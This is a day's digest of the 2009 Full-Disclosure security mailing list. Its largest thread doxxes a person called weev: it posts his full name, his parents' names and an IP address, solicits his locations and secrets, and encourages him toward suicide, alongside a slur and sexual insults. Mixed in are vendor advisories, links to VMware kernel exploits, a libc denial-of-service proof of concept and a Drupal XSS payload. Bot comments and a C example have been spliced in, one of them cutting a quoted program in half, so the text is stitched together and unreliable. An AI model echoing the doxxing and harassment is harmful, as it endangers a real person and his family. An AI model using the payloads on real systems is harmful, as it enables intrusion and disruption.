Re: [Full-disclosure] So weev...

2009-10-02 Thread Wintermute

We are glad this is being taken well:

02:23 januszeal i read what the kikes did to you
02:23 januszeal i raged :(
02:24 weev lol
02:24 weev i dont mind
02:24 weev theyre doin me a favor

...because as a 5'4, 130-pound guy, there is not much that you can
do *but* take this sort of thing well. We would not want to see
little Andrew overexert himself.

WINTERMUTE

On Thu, 01 Oct 2009 22:43:12 -0500 GOBBLES j...@mac.hush.com wrote:
I posted on here earlier as netdev.doctor questioning weev on how
he feels psychologically.

*spins weev around*
*grins*

I feel such invigorating justice seeing your real identity
mirrored. Redundancy. Freedom of information.

I hypothesize weev may possibly kill himself, unfortunately. I'm
unsure how to approach it because I hear he may have left the
United States. If not, he'll cling on like a Michael Crook kinda
guy (which he is closely emulating nowadays).

These kids are like mean infants.

If I were in your shoes, I would intellectually be considering
ending my life. However that's just me.

I don't think you should. However, if it were me, it would stop
the pain, and my life path that I really couldn't ever fix now.

This is purity. This is what happens when you become arrogant,
come down here with orders from God. You get crucified bitch.
Just like Jesus. Your hung on a cross the same place you ruined
people's lives.

plz advz
hep

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] So weev...

2009-10-02 Thread Wintermute

On Thu, 01 Oct 2009 21:15:08 -0500 GOBBLES gobbles1...@safe-mail.net wrote:

She's gorgeous and looks like a great mother.

I'm totally surprised, he sounds like he has the nicest family in
the world.

They do sound nice, bless their hearts. We should have mentioned it
earlier, but pops's name is Mark, and Mommy Weev is Catherine,
although she has taken to going by Alyse as of late.

Contact was initiated with them after our original post, and they
claim they have not talked to or seen Andrew in over two years. It
appears, sadly, that weev's destructive tendencies have affected
even his immediate family.

WINTERMUTE


Re: [Full-disclosure] So weev...

2009-10-02 Thread dramacrat
Man, you guys are real elite hackers. You can get into *#ed* and read the
chat. Holy fuck, you penetrated the public channel of Encyclopedia
Dramatica, which as we all know is the world's most elite hacker crew.

2009/10/2 Wintermute winterm...@hush.com


 We are glad this is being taken well:

 02:23 januszeal i read what the kikes did to you
 02:23 januszeal i raged :(
 02:24 weev lol
 02:24 weev i dont mind
 02:24 weev theyre doin me a favor

 ...because as a 5'4, 130-pound guy, there is not much that you can
 do *but* take this sort of thing well. We would not want to see
 little Andrew overexert himself.

 WINTERMUTE

 On Thu, 01 Oct 2009 22:43:12 -0500 GOBBLES j...@mac.hush.com wrote:
 I posted on here earlier as netdev.doctor questioning weev on how
 he feels psychologically.
 
 *spins weev around*
 *grins*
 
 I feel such invigorating justice seeing your real identity
 mirrored. Redundancy. Freedom of information.
 
 I hypothesize weev may possibly kill himself, unfortunately. I'm
 unsure how to approach it because I hear he may have left the
 United States. If not, he'll cling on like a Michael Crook kinda
 guy (which he is closely emulating nowadays).
 
 These kids are like mean infants.
 
 If I were in your shoes, I would intellectually be considering
 ending my life. However that's just me.
 
 I don't think you should. However, if it were me, it would stop
 the pain, and my life path that I really couldn't ever fix now.
 
 This is purity. This is what happens when you become arrogant,
 come down here with orders from God. You get crucified bitch.
 Just like Jesus. Your hung on a cross the same place you ruined
 people's lives.
 
 plz advz
 hep
 

Re: [Full-disclosure] VMSA-2009-0013 VMware Fusion resolves two security issues

2009-10-02 Thread mu-b

All - the first bug is self-explanatory,

 # Kernel denial of service vulnerability
 An integer overflow vulnerability in the vmx86 kernel extension allows
 for a denial of service by an unprivileged user.

The vmx86 kext ioctl handler contains several integer overflows which
lead to kernel heap corruptions. These are probably not exploitable, and
I didn't try given the second bug,

http://www.digit-labs.org/files/exploits/vmware-pop.c

 # Kernel code execution vulnerability
 An ioctl vulnerability in the vmx86 kernel extension allows for
 executing arbitrary code in the kernel context by an unprivileged
 user.

The vmx86 kext ioctl handler permits an unprivileged userland program to
initialize several function pointers via the 0x802E564A ioctl code.
These function pointers are later used from several reachable locations
within the driver, one of which is called immediately after initialization.

http://www.digit-labs.org/files/exploits/vmware-fission.c

--
mu-b
(m...@digit-labs.org)

  Only a few people will follow the proof. Whoever does will
 spend the rest of his life convincing people it is correct.
- Anonymous, P ?= NP


[Full-disclosure] libc:fts_*() Multiple Denial of Service

2009-10-02 Thread Maksymilian Arciemowicz

[libc:fts_*() Multiple Denial of Service ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- Dis.: 03.08.2009
- Pub.: 02.10.2009

We are going to inform all vendors about this problem.

Affected Software (official):
- OpenBSD 4.5 (fix available)
- NetBSD 5.0.1 (fix available)

probably more...

Original URL:
http://securityreason.com/achievement_securityalert/68

--- 0. Description ---
The fts functions are provided for traversing UNIX file hierarchies. The
fts_open() function returns a handle on a file hierarchy, which is then
supplied to the other fts functions. The function fts_read() returns a
pointer to a structure describing one of the files in the file hierarchy.
The function fts_children() returns a pointer to a linked list of
structures, each of which describes one of the files contained in a
directory within the hierarchy.

typedef struct _ftsent {
        unsigned short fts_info;        /* flags for FTSENT structure */
        char *fts_accpath;              /* access path */
        char *fts_path;                 /* root path */
        size_t fts_pathlen;             /* strlen(fts_path) */
        char *fts_name;                 /* file name */
        size_t fts_namelen;             /* strlen(fts_name) */
        short fts_level;                /* depth (-1 to N) */
        int fts_errno;                  /* file errno */
        long fts_number;                /* local numeric value */
        void *fts_pointer;              /* local address value */
        struct _ftsent *fts_parent;     /* parent directory */
        struct _ftsent *fts_link;       /* next file structure */
        struct _ftsent *fts_cycle;      /* cycle structure */
        struct stat *fts_statp;         /* stat(2) information */
} FTSENT;

--- 1. libc:fts_*() Multiple Denial of Service ---
In March 2009, we reported an issue (SREASONRES:20090304) in libc (fts.c).
Now we want to present the conclusions and show the usefulness of this
vulnerability. The fix provided by the OpenBSD Team will protect us from
the crash but, we think, not in all the cases that are shown in this
advisory.

Index: fts.c
===
RCS file: /cvs/src/lib/libc/gen/fts.c,v
retrieving revision 1.41
diff -u -p -r1.41 fts.c
- - --- fts.c 27 Dec 2008 12:30:13 - 1.41
+++ fts.c 10 Feb 2009 09:00:24 -
@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type)
len++;
maxlen = sp-fts_pathlen - len;

+ if (cur-fts_level == SHRT_MAX) {
+ (void)closedir(dirp);
+ cur-fts_info = FTS_ERR;
+ SET(FTS_STOP);
+ errno = ENAMETOOLONG;
+ return (NULL);
+ }
+
level = cur-fts_level + 1;

/* Read the directory, attaching each entry to the `link' pointer. */
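
Review bot: The added block in fts_build() calls SET(FTS_STOP) and returns NULL, so one directory at SHRT_MAX ends the whole traversal rather than only that subtree, and a caller such as rm(1) will leave every remaining sibling untouched. Consider flagging only cur as an error entry and letting the walk continue with the next sibling, or at least state in the manual page that this return means the walk is incomplete. ENAMETOOLONG is also reused here for a depth limit rather than a path-length limit, so a short comment above the check explaining that choice would help.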

So let's look at /etc/rc.d/cleartmp (NetBSD 5.0.1). This script uses rm(1)
with the -rf args.

Line 40-41:
find -x . ! -name . ! -name lost+found ! -name quota.user \
! -name quota.group -exec rm -rf -- {} \; -type d -prune)


Here the daemon will come to tmp_dir (/tmp) and want to clean it with the
sequence [a-km-pr-zA-Z]*. It will kill this script any time it is started.
So if we create directory A in /tmp, all other files and directories, in
alphabetical order, will not be deleted.

Proof of Concept:
User cxib has created the exploit in the main /tmp dir.

exploit:
127# cd /tmp  perl -e '$a=Cx22;for(1..5){ ! -d $a and mkdir $a and 
chdir $a }'

In /tmp we have

# ls -la
total 22
drwxrwxrwt  10 root  wheel   512 Aug 11 01:18 .
drwxr-xr-x  27 root  wheel  1024 Aug 11 00:09 ..
drwxrwxrwx   2 root  wheel   512 Aug 11 00:49 .ICE-unix
-r--r--r--   1 root  wheel    11 Aug 11 00:11 .X0-lock
drwxrwxrwt   2 root  wheel   512 Aug 11 00:11 .X11-unix
-rw-r--r--   1 root  wheel     0 Aug 11 01:18 A
drwxr-xr-x   2 root  wheel   512 Aug 11 01:15 B
drwxr-xr-x   3 cxib  wheel   512 Aug  6 01:43 CC
drwxr-xr-x   2 root  wheel   512 Aug 11 01:15 D
-rw-r--r--   1 root  wheel     0 Aug 11 01:16 chujwamwmuzg
drwx------   2 root  wheel   512 Aug 11 00:49 kde-root
drwx------   3 root  wheel   512 Aug 11 01:14 ksocket-root
drwx------   2 root  wheel   512 Aug 11 00:11 mc-root

Correct behavior will delete all files after reboot. So let's do it.

# reboot

Now we have in /tmp

# ls -la
total 18
drwxrwxrwt   9 root  wheel   512 Aug 11 13:57 .
drwxr-xr-x  27 root  wheel  1024 Aug 11 14:02 ..
drwxrwxrwx   2 root  wheel   512 Aug 11 00:49 .ICE-unix
drwxrwxrwt   2 root  wheel   512 Aug 11 01:19 .X11-unix
drwxr-xr-x   3 cxib  wheel   512 Aug  6 01:43 CC
drwxr-xr-x   2 root  wheel   512 Aug 11 01:15 D
-rw-r--r--   1 root  wheel     0 Aug 11 01:16 chujwamwmuzg
drwx------   2 root  wheel   512 Aug 11 00:49 kde-root
drwx------   3 root  wheel   512 Aug 11 01:19 ksocket-root
drwx------   2 root  wheel   512 Aug 11 00:11 mc-root


File A and dir B have been deleted. But file chujwamwmuzg and directories
{D,Cx22} are still available. To resolve this, we can use the OpenBSD fix.
However, this does not fully resolve the problem. The user can create a
directory (like Cx22) that cannot be removed by rm(1).

To remove the Cx22 folder, we can use a program made by OpenBSD

---
#include <err.h>
#include <stdlib.h>
#include <unistd.h>

int
main(int argc, char *argv[])
{
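
The failure this advisory describes, seen from the caller's side, as an added example that is not part of the original post or of any vendor's code: a cleanup job that walks a tree with fts(3) has to treat an error entry or a failing fts_read() as an incomplete walk instead of carrying on as if /tmp were clean. The names audit_tree, walk_report, depth_limit and chain are hypothetical, the sample tree under /tmp is constructed, and a libc that ships <fts.h> is assumed.

```c
/* Added example, not code from the advisory: a caller that checks whether an
 * fts(3) walk really finished. All names below are hypothetical. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE /* mkdtemp() on glibc */
#endif
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>
#include <fts.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

struct walk_report {
    long entries;    /* files and directories visited (pre-order) */
    int  max_level;  /* deepest fts_level seen */
    int  errors;     /* FTS_ERR / FTS_DNR / FTS_NS entries or fts_read() failure */
    int  too_deep;   /* set when a directory was pruned at depth_limit */
    int  last_errno; /* errno of the most recent error, 0 if none */
};

/* Returns 0 when the whole tree was visited, 1 when the walk was incomplete
 * (error or depth limit reached), -1 when fts_open() failed. */
int audit_tree(const char *root, int depth_limit, struct walk_report *r)
{
    char *paths[2] = { (char *)root, NULL };
    FTS *fts;
    FTSENT *e;

    memset(r, 0, sizeof(*r));
    fts = fts_open(paths, FTS_PHYSICAL | FTS_XDEV, NULL);
    if (fts == NULL) {
        r->last_errno = errno;
        return -1;
    }
    for (;;) {
        errno = 0;
        e = fts_read(fts);
        if (e == NULL) {
            /* NULL with errno set is a failed walk, e.g. the ENAMETOOLONG
             * that the patched fts_build() reports at SHRT_MAX. */
            if (errno != 0) {
                r->errors++;
                r->last_errno = errno;
            }
            break;
        }
        if (e->fts_info == FTS_DP)
            continue;                     /* post-order revisit of a directory */
        r->entries++;
        if (e->fts_level > r->max_level)
            r->max_level = e->fts_level;
        if (e->fts_info == FTS_ERR || e->fts_info == FTS_DNR ||
            e->fts_info == FTS_NS) {
            r->errors++;
            r->last_errno = e->fts_errno;
        } else if (e->fts_info == FTS_D && e->fts_level >= depth_limit) {
            r->too_deep = 1;              /* refuse to descend any further */
            fts_set(fts, e, FTS_SKIP);
        }
    }
    fts_close(fts);
    return (r->errors || r->too_deep) ? 1 : 0;
}

/* Create (make=1) or remove (make=0) the constructed sample chain
 * root/d/d/.../d with `depth` nested directories under an existing root. */
int chain(const char *root, int depth, int make)
{
    char path[512];
    size_t len = strlen(root);
    int i;

    if (len + 2 * (size_t)depth + 1 > sizeof(path))
        return -1;
    memcpy(path, root, len + 1);
    for (i = 0; i < depth; i++) {
        memcpy(path + len + 2 * (size_t)i, "/d", 3);
        if (make && mkdir(path, 0700) != 0)
            return -1;
    }
    for (i = depth; !make && i > 0; i--) {
        if (rmdir(path) != 0)
            return -1;
        path[len + 2 * (size_t)(i - 1)] = '\0';
    }
    return 0;
}

int main(void)
{
    char root[] = "/tmp/fts_audit_XXXXXX"; /* constructed sample tree */
    struct walk_report r;
    int rc;

    if (mkdtemp(root) == NULL || chain(root, 5, 1) != 0)
        return 2;
    rc = audit_tree(root, 3, &r);          /* limit below the real depth */
    printf("rc=%d entries=%ld max_level=%d too_deep=%d errors=%d\n",
           rc, r.entries, r.max_level, r.too_deep, r.errors);
    return (chain(root, 5, 0) == 0 && rmdir(root) == 0) ? 0 : 1;
}
```

A non-zero return from audit_tree() is the signal a cleanup script should log and act on, because entries after the failing one were never visited.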
  

[Full-disclosure] So weev...

2009-10-02 Thread Nobody Special
216.12.127.190

Enjoy. He's been using this IP address for awhile.




[Full-disclosure] Drupal Service Links 6.x-1.0 XSS Vulnerability

2009-10-02 Thread Justin Klein Keane

Description of Vulnerability:
-----------------------------
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL that provides extensibility through various
third party modules.  The Service links module
(http://drupal.org/project/service_links) enables admins to add links
to a number of social bookmarking sites, blog search sites etc. 

The Service Links module contains a cross site scripting vulnerability
because it does not properly sanitize output of content type names
before display.

Systems affected:
-----------------
Drupal 6.14 with Service links 6.x-1.0 was tested and shown to be
vulnerable.

Impact:
-------
XSS vulnerabilities may expose site administrative accounts to
compromise which could lead to web server process compromise.

Mitigating factors:
-------------------
The Service links module must be installed.  To carry out a Service
links based XSS exploit the attacker must have 'administer content
types' permissions.

Proof of Concept:
-----------------
1.  Install Drupal 6.14
2.  Install Service links 6.x-1.0
3.  Enable the Service links module from Administer -> Site building ->
Modules
4.  Create a new Content type from Administer -> Content management ->
Content types and click 'Add content type'
5.  For the 'name' field enter <script>alert('xss');</script> and save
the content type
6.  Click Administer -> Site configuration -> Service links to trigger
the JavaScript

Technical details:
------------------
The Service links module fails to sanitize the output of the content
type names before display.  Applying the following patch fixes this
vulnerability.

Patch
-----
Applying the following patch mitigates these threats.

- --- service_links/service_links.module2008-02-26 12:01:27.0 
-0500
+++ service_links_fixed/service_links.module2009-10-02
06:33:21.0 -0400
@@ -35,11 +35,12 @@ function service_links_admin_settings()
 '#title' = t('Where to show the service links'),
 '#description' = t('Set the node types and categories you want to
display links for.'),
   );
+  $names = array_map('filter_xss', node_get_types('names'));
   $form['where_to_show_the_links']['service_links_node_types'] = array(
 '#type' = 'checkboxes',
 '#title' = t('Node types'),
 '#default_value' = variable_get('service_links_node_types', array()),
- -'#options' = node_get_types('names'),
+'#options' = $names,
   );
   if (module_exists('taxonomy')) {
 $form['where_to_show_the_links']['service_links_category_types'] =
array(
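
Review bot: The added array_map('filter_xss', node_get_types('names')) line relies on filter_xss(), which still passes its default whitelist of HTML tags through to the checkbox labels; content type names are plain text, so check_plain() is the stricter escape for '#options' here. This hunk only covers service_links_admin_settings(), so any other place where the module prints node_get_types('names') should get the same treatment.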

--

Justin C. Klein Keane
http://www.MadIrish.net


[Full-disclosure] [SECURITY] [DSA 1898-1] New openswan packages fix denial of service

2009-10-02 Thread Florian Weimer

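------------------------------------------------------------------------
Debian Security Advisory DSA-1898-1                  secur...@debian.org
http://www.debian.org/security/                           Florian Weimer
October 02, 2009                      http://www.debian.org/security/faq
------------------------------------------------------------------------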

Package: openswan
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2009-2185

It was discovered that the pluto daemon in the openswan, an
implementation of IPSEC and IKE, could crash when processing a crafted
X.509 certificate.

For the old stable distribution (etch), this problem has been fixed in
version 2.4.6+dfsg.2-1.1+etch2.

For the stable distribution (lenny), this problem has been fixed in
version 2.4.12+dfsg-1.3+lenny2.

For the unstable distribution (sid), this problem has been fixed in
version 2.6.22+dfsg-1.

We recommend that you upgrade your openswan package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.



[Full-disclosure] Please ban the Trolls.

2009-10-02 Thread full-censorship
don't stop at n3td3v ban the others as well.

thank me later,

the full-censorship movement



[Full-disclosure] [SECURITY] [DSA 1899-1] New strongswan packages fix denial of service

2009-10-02 Thread Florian Weimer

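------------------------------------------------------------------------
Debian Security Advisory DSA-1899-1                  secur...@debian.org
http://www.debian.org/security/                           Florian Weimer
October 02, 2009                      http://www.debian.org/security/faq
------------------------------------------------------------------------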

Package: strongswan
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2009-1957 CVE-2009-1958 CVE-2009-2185 CVE-2009-2661
Debian Bug : 531612 533837 540144

Several remote vulnerabilities have been discovered in strongswan, an
implementation of the IPSEC and IKE protocols.  The Common
Vulnerabilities and Exposures project identifies the following
problems:

CVE-2009-1957
CVE-2009-1958

The charon daemon can crash when processing certain crafted IKEv2
packets.  (The old stable distribution (etch) was not affected by
these two problems because it lacks IKEv2 support.)

CVE-2009-2185
CVE-2009-2661

The pluto daemon could crash when processing a crafted X.509
certificate.

For the old stable distribution (etch), these problems have been fixed
in version 2.8.0+dfsg-1+etch2.

For the stable distribution (lenny), these problems have been fixed in
version 4.2.4-5+lenny3.

For the unstable distribution (sid), these problems have been fixed in
version 4.3.2-1.1.

We recommend that you upgrade your strongswan packages.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Re: [Full-disclosure] Please ban the Trolls.

2009-10-02 Thread Stuart Dunkeld
1/10

Must Try Harder.

On Fri, Oct 2, 2009 at 6:59 PM,  full-censors...@hushmail.com wrote:
 don't stop at n3td3v ban the others as well.

 thank me later,

 the full-censorship movement



[Full-disclosure] THE FULL-CENSORSHIP MOVEMENT

2009-10-02 Thread full-censorship
THE FULL-CENSORSHIP MOVEMENT

OUR GOALS

* we are a movement of security professionals who will complain about
every troll

* we believe anybody who offends us should be banned

* we will not stop until every troll is banned

PAST ACHIEVEMENT

* we forced n3td3v to be banned mean as we go on now to get the rest
banned

CALL FOR MEMBERS

* we want every security professional to rise up against
full-disclosure trolls and get them banned

WORKING GROUP

* we would like to create a working task group of all the major email
providers to collaborate IP intelligence



[Full-disclosure] [ MDVSA-2009:255 ] perl-DBD-Pg

2009-10-02 Thread security


 ___

 Mandriva Linux Security Advisory MDVSA-2009:255
 http://www.mandriva.com/security/
 ___

 Package : perl-DBD-Pg
 Date: October 2, 2009
 Affected: Corporate 4.0
 ___

 Problem Description:

 A vulnerability was discovered and corrected in perl-DBD-Pg:
 
 Heap-based buffer overflow in the DBD::Pg module for Perl might allow
 context-dependent attackers to execute arbitrary code via unspecified
 input to an application that uses the getline and pg_getline functions
 to read database rows.
 
 This update provides a fix for this vulnerability.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0663
 ___

 Updated Packages:

 Corporate 4.0:
 e3c38bea68b6e9fe28cc153b3c948c4b  
corporate/4.0/i586/perl-DBD-Pg-1.43-2.1.20060mlcs4.i586.rpm 
 4bc29785b1dfd8449775ddbbcce697f6  
corporate/4.0/SRPMS/perl-DBD-Pg-1.43-2.1.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 341998c53e860a0ea02c32fb62baa8e0  
corporate/4.0/x86_64/perl-DBD-Pg-1.43-2.1.20060mlcs4.x86_64.rpm 
 4bc29785b1dfd8449775ddbbcce697f6  
corporate/4.0/SRPMS/perl-DBD-Pg-1.43-2.1.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com


Re: [Full-disclosure] THE FULL-CENSORSHIP MOVEMENT

2009-10-02 Thread vulcanius
Who is we? Weren't you calling for n3td3v to be allowed back not long
ago? Do you see the irony in your message?

I know how you can get at least one troll off the list, unsubscribe.


On Fri, Oct 2, 2009 at 4:08 PM,  full-censors...@hushmail.com wrote:
 THE FULL-CENSORSHIP MOVEMENT

 OUR GOALS

 * we are a movement of security professionals who will complain
 about every troll

 * we believe anybody who offends us should be banned

 * we will not stop until every troll is banned

 PAST ACHIEVEMENT

 * we forced n3td3v to be banned mean as we go on now to get the
 rest banned

 CALL FOR MEMBERS

 * we want every security professional to rise up against
 full-disclosure trolls and get them banned

 WORKING GROUP

 * we would like to create a working task group of all the major
 email providers to collaborate IP intelligence



[Full-disclosure] n3td3v the new age martyr of the full-disclosure mailing list

2009-10-02 Thread full-censorship
we're making n3td3v a martyr of the full-disclosure mailing list.

join hands in a circle and ban the other trolls in the name of our 
martyr.

three cheers for our martyr!!! ban the trolls, ban the trolls, ban 
the trolls!!!

vulcanius vulcan...@gmail.com wrote:
 Who is we? Weren't you calling for n3td3v to be allowed back not long
 ago? Do you see the irony in your message?

 I know how you can get at least one troll off the list, unsubscribe.


 full-censors...@hushmail.com wrote:
 THE FULL-CENSORSHIP MOVEMENT

 OUR GOALS

 * we are a movement of security professionals who will complain
 about every troll

 * we believe anybody who offends us should be banned

 * we will not stop until every troll is banned




Re: [Full-disclosure] So weev...

2009-10-02 Thread GOBBLES
Hello.

There is a strong likelihood chance we can get Andrew into prison for his 
criminal activity.

Weev's affect hasn't just harassed innocents, but also came to the dismay of 
his former associates, who casted suspicion on due to his poor choices.

If you have been victimized by Weev and no legal efforts or requests have 
worked, please submit any evidence you have to http://tips.fbi.gov.

Also, if you have any personal information that is of any value including:

- his secrets
- personality
- pictures
- locations
- methods of alluding law enforcement
- your story of him harasses you or your friends
- et cetera

please mail them to me personally (or on this list).

Thank you, and remember that n3td3v and Gary McKinnon always has the finest in 
intelligence.


 Original Message 
From: Nobody Special infodro...@yahoo.com
Apparently from: full-disclosure-boun...@lists.grok.org.uk
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] So weev...
Date: Fri, 2 Oct 2009 07:24:35 -0700 (PDT)
 

 
 216.12.127.190
 
 Enjoy. He's been using this IP address for awhile.
 
 

Re: [Full-disclosure] n3td3v the new age martyr of the full-disclosure mailing list

2009-10-02 Thread TheLearner
http://www.youtube.com/watch?v=apEuFdzP5ZU

This will not stand.

The Information Security community has absolutely no tolerance for 
censorship.

- AntiSec

On Fri, 02 Oct 2009 22:16:27 + full-censors...@hushmail.com wrote:
we're making n3td3v a martyr of the full-disclosure mailing list.

join hands in a circle and ban the other trolls in the name of our
martyr.

three cheers for our martyr!!! ban the trolls, ban the trolls, ban
the trolls!!!

vulcanius vulcan...@gmail.com wrote:
 Who is we? Weren't you calling for n3td3v to be allowed back not long
 ago? Do you see the irony in your message?

 I know how you can get at least one troll off the list, unsubscribe.


 full-censors...@hushmail.com wrote:
 THE FULL-CENSORSHIP MOVEMENT

 OUR GOALS

 * we are a movement of security professionals who will complain
 about every troll

 * we believe anybody who offends us should be banned

 * we will not stop until every troll is banned




[Full-disclosure] So weev...

2009-10-02 Thread GOBBLES
Hello,

I think there is a good chance we can get Andrew into prison for his criminal 
activity.

Weev's affect hasn't just harassed innocents, but also came to the dismay of 
his former associates, who casted suspicion on due to his poor choices.

If you have been victimized by Weev and no legal efforts or requests have 
worked, please submit any evidence you have to http://tips.fbi.gov.

Also, if you have any personal information that is of any value including:

- his secrets
- personality
- pictures
- locations
- methods of alluding law enforcement
- et cetera

please mail them to me personally (or on this list).



Re: [Full-disclosure] So weev...

2009-10-02 Thread GOBBLES
This is about fighting crime. Not about putting your stuff into the alleged 
suspect's mother.

Please have some sense of courtesy and professionalism.

*ISRAEL*
Internet Sleuth, Richard Anderson,
Electronic Lawyer

 Original Message 
From: BMF badmotherfs...@gmail.com
To: GOBBLES gobbles1...@safe-mail.net
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] So weev...
Date: Fri, 2 Oct 2009 17:08:40 -0700
 

 On Fri, Oct 2, 2009 at 4:57 PM, GOBBLES gobbles1...@safe-mail.net wrote:
  
  
  There is a strong likelihood chance we can get Andrew into prison for his 
  criminal activity.
  
 
 
 Sweet! I love to send people to Federal Pound me in the ass Prison! While 
 Bubba is fudgin' this weev character I can be fudgin' his momma!
 

Re: [Full-disclosure] So weev...

2009-10-02 Thread BMF
On Fri, Oct 2, 2009 at 4:57 PM, GOBBLES gobbles1...@safe-mail.net wrote:

 There is a strong likelihood chance we can get Andrew into prison for his
 criminal activity.


Sweet! I love to send people to Federal Pound me in the ass Prison! While
Bubba is fudgin' this weev character I can be fudgin' his momma!

Re: [Full-disclosure] So weev...

2009-10-02 Thread BMF
On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES gobbles1...@safe-mail.net wrote:
 This is about fighting crime. Not about putting your stuff into the alleged
 suspect's mother.

 Please have some sense of courtesy and professionalism.

Bwahahahha...someone who posts other peoples dirty laundry and pics of
his family and goes by the name GOBBLES (as in gobbles knobs) is
lecturing ME on courtesy and professionalism? You don't care one wit
about crime or professionalism. Now if you'll excuse me I gotta go
beat off to this pic of his momma you posted...say, got any pics of
your momma?



Re: [Full-disclosure] So weev...

2009-10-02 Thread BMF
On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES gobbles1...@safe-mail.net wrote:
 Not about putting your stuff into the alleged suspect's mother.

Also: Isn't it way late to start using words like alleged? You have
already definitively stated that he has done the deeds. What's the
point?



Re: [Full-disclosure] So weev...

2009-10-02 Thread TheLearner
I don't see how mirroring information about weev -- that was 
already posted by someone else -- signifies I don't care about 
crime.

I believe you're being a relativist. I feel you're miffed I care too 
much about justice and not enough about your sociopathic troll 
persona. Have a warm cup of soothing tea (cognitive dissonance is a 
bitch), and listen, because I'm going to help you:

Now if you really wish, we can get you two on a date. However, you 
have to shape up that attitude, she looks like a real wholesome 
woman who wouldn't be impressed by latest emails. They are lurid!

She is a woman who no doubt wants a smart man who works hard. I'm 
sure she loves her husband! TheiProphet said that her mom wanted an 
intellectual friend, not a kid. And that his dead was totally 
absent

You have a chance of getting with Andrew Auernheimer's (AKA Weev's) 
mom, Cathy, however you need to lighten up that nihilistic troll 
rhetoric. I need you to rent a tuxedo, get on SILC, and we'll start 
greasing the wheels. We got success ahead!

And remember, n3td3v is True Intelligence in an Open world.

 Original Message 
From: BMF badmotherfs...@gmail.com
To: GOBBLES gobbles1...@safe-mail.net
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] So weev...
Date: Fri, 2 Oct 2009 17:19:14 -0700

 On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES gobbles1...@safe-mail.net wrote:
  This is about fighting crime. Not about putting your stuff into the alleged
  suspect's mother.
 
  Please have some sense of courtesy and professionalism.
 
 Bwahahahha...someone who posts other peoples dirty laundry and pics of
 his family and goes by the name GOBBLES (as in gobbles knobs) is
 lecturing ME on courtesy and professionalism? You don't care one wit
 about crime or professionalism. Now if you'll excuse me I gotta go
 beat off to this pic of his momma you posted...say, got any pics of
 your momma?



Re: [Full-disclosure] So weev...

2009-10-02 Thread TheLearner
My emails are not to be read hypercritically. Rather, you should 
get the point as whole. 

http://tips.fbi.gov = Are you an 'alleged' victim of weev (Now 
disclosed to be known as Andrew Auernheimer)? Help want to change 
this, and to do that, we need you to report your experiences to the 
federal bureau of investigation.

Thank you.

On Sat, 03 Oct 2009 00:22:51 + BMF badmotherfs...@gmail.com wrote:
On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES gobbles1...@safe-mail.net wrote:
 Not about putting your stuff into the alleged suspect's mother.

Also: Isn't it way late to start using words like alleged? You have
already definitively stated that he has done the deeds. What's the
point?




Re: [Full-disclosure] So weev...

2009-10-02 Thread Wintermute
 (Now disclosed to be known as Andrew Auernheimer)? Help want ...

We interrupt momentarily to notify you that his name is Andrew Alan
Escher Auernheimer. Kind of a funky set of middle names. We are
envious.

WINTERMUTE


Re: [Full-disclosure] So weev...

2009-10-02 Thread dramacrat
I wouldn't be too concerned if I was weev.

A guy who uses phrases like *alleged suspect* and* likelihood chance* is
after him! Oh dear, he must be going to accuse weev of being an *illegal
criminal*!

2009/10/3 GOBBLES gobbles1...@safe-mail.net

 This is about fighting crime. Not about putting your stuff into the alleged
 suspect's mother.

 Please have some sense of courtesy and professionalism.

 *ISRAEL*
 Internet Sleuth, Richard Anderson,
 Electronic Lawyer


  Original Message 
 From: BMF badmotherfs...@gmail.com
 To: GOBBLES gobbles1...@safe-mail.net
 Cc: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] So weev...
 Date: Fri, 2 Oct 2009 17:08:40 -0700


 On Fri, Oct 2, 2009 at 4:57 PM, GOBBLES gobbles1...@safe-mail.net wrote:

 There is a strong likelihood chance we can get Andrew into prison for his
 criminal activity.


 Sweet! I love to send people to Federal Pound me in the ass Prison! While
 Bubba is fudgin' this weev character I can be fudgin' his momma!



Re: [Full-disclosure] So weev...

2009-10-02 Thread Wintermute
We are not convinced; weev seems to have been concerned with net-
IRL identity mapping in the past:

seriously. we need a sysop faq that is sure to state that the only
person we are allowed to mention when talking about ED ownership is
joseph evers. -- weev, 20080531, correspondence

yes please scrub realnames from ED -- weev, 20080531,
correspondence

